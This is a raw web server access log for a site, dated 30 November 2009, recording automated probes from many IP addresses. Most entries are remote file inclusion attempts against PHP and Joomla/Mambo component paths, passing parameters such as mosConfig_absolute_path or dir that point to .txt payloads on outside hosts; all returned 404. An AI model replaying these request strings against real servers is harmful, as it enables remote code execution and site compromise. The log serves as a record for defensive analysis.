67.19.66.10 - - [30/Nov/2009:01:31:29 -0800] "GET /logs/access.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [30/Nov/2009:01:31:33 -0800] "GET /logs/access_090720.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:31:52 -0800] "GET /logs/access_090629.log%20%20//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:31:52 -0800] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:31:52 -0800] "GET /logs//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:32:05 -0800] "GET /logs/access_090914.log%20%20//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [30/Nov/2009:01:32:27 -0800] "GET /logs/access_090713.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.cbnumed.or.kr//bbs/icon/azka.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:32:38 -0800] "GET /logs//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:32:38 -0800] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:32:42 -0800] "GET /logs/access_090629.log//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [30/Nov/2009:01:32:47 -0800] "GET /logs/access_090914.log//errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:33:55 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:01:34:19 -0800] "GET /logs/access_091026.log////skin/ggambo7002_board/comment_modify.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:34:38 -0800] "GET /logs/access.log//gswheel_system_bak/skin/board/setup.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:41 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:41 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:41 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:42 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:42 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:34:42 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:01:34:51 -0800] "GET /logs/access.log////skin/happycast//ask_password.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:01:34:51 -0800] "GET ///skin/happycast//ask_password.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:01:34:51 -0800] "GET /logs////skin/happycast//ask_password.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.246.151.62 - - [30/Nov/2009:01:34:51 -0800] "GET /logs/access_090907.log////skin/happycast//ask_password.php?dir=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:04 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:04 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:04 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:08 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:08 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [30/Nov/2009:01:35:08 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [30/Nov/2009:01:37:07 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [30/Nov/2009:01:37:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [30/Nov/2009:01:37:07 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.186.117.57 - - [30/Nov/2009:01:37:48 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:01:38:05 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [30/Nov/2009:01:38:05 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:38:21 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.231.148.194 - - [30/Nov/2009:01:38:21 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
199.231.148.194 - - [30/Nov/2009:01:38:21 -0800] "GET /logs/access.log%20%20//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.66.10 - - [30/Nov/2009:01:38:52 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.66.10 - - [30/Nov/2009:01:38:52 -0800] "GET /logs/access.log%20%20//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.66.10 - - [30/Nov/2009:01:38:54 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.115.152 - - [30/Nov/2009:01:39:28 -0800] "GET /logs/?N=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
190.97.219.4 - - [30/Nov/2009:01:43:13 -0800] "GET /logs/access_090713.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:44:34 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.186.117.57 - - [30/Nov/2009:01:44:42 -0800] "GET /logs/access_090622.log//components/com_virtuemart/errors.php?error=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.galf.org"
213.186.117.57 - - [30/Nov/2009:01:44:43 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.galf.org"
213.186.117.57 - - [30/Nov/2009:01:44:43 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.groupe-rouquette.com/Jacquier/src//idste.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:45:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:45:39 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:45:41 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:00 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:00 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:01 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:46:43 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:46:45 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:46:45 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:46:45 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:56 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:57 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:46:57 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:47:00 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:47:19 -0800] "GET /logs/access_090824.log////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:47:19 -0800] "GET ///saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:47:19 -0800] "GET /logs////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:47:55 -0800] "GET /logs/access_090907.log////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:01:47:58 -0800] "GET /logs/access_090622.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:01:47:58 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:01:48:00 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET /logs/access_090622.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:48:42 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:48:57 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:01 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:03 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:03 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:03 -0800] "GET /logs/access_090622.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:03 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:49:03 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:49:11 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:49:23 -0800] "GET /logs/access_090824.log%20%20////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:49:31 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:49:31 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:01:49:31 -0800] "GET /logs/access_090622.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.186.1.54 - - [30/Nov/2009:01:49:31 -0800] "GET /logs/access_090907.log%20%20////saveserver.php?thisdir=http://bablytrade.com/den/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [30/Nov/2009:01:49:37 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
195.13.191.76 - - [30/Nov/2009:01:49:37 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
195.13.191.76 - - [30/Nov/2009:01:49:37 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
67.19.66.10 - - [30/Nov/2009:01:49:50 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [30/Nov/2009:01:50:03 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
80.82.115.41 - - [30/Nov/2009:01:52:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:52:05 -0800] "GET /logs/access_090921.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:52:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.82.115.41 - - [30/Nov/2009:01:52:10 -0800] "GET /logs/access_090608.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:52:34 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:52:34 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:52:34 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:53:54 -0800] "GET /logs/access_090608.log///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:01:53:54 -0800] "GET /logs/access_091019.log///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:54:14 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:54:46 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.230 - - [30/Nov/2009:01:54:58 -0800] "GET /////setup?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.230 - - [30/Nov/2009:01:54:58 -0800] "GET /logs/access.log//////setup?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.234.200.230 - - [30/Nov/2009:01:54:58 -0800] "GET /logs//////setup?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:56:10 -0800] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:56:22 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:57:26 -0800] "GET /skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:57:28 -0800] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:57:37 -0800] "GET /logs/access.log//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.66.10 - - [30/Nov/2009:01:57:37 -0800] "GET /logs//skin/happycast_category_bluishgreen/login.php?dir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.231.148.194 - - [30/Nov/2009:01:57:48 -0800] "GET /logs/access_090622.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ostrava.kr//bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:58:13 -0800] "GET /logs/access_090907.log//bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:58:13 -0800] "GET /bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:58:17 -0800] "GET /logs//bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:58:41 -0800] "GET /bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [30/Nov/2009:01:58:41 -0800] "GET /logs//bp_ncom.php?bnrep=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
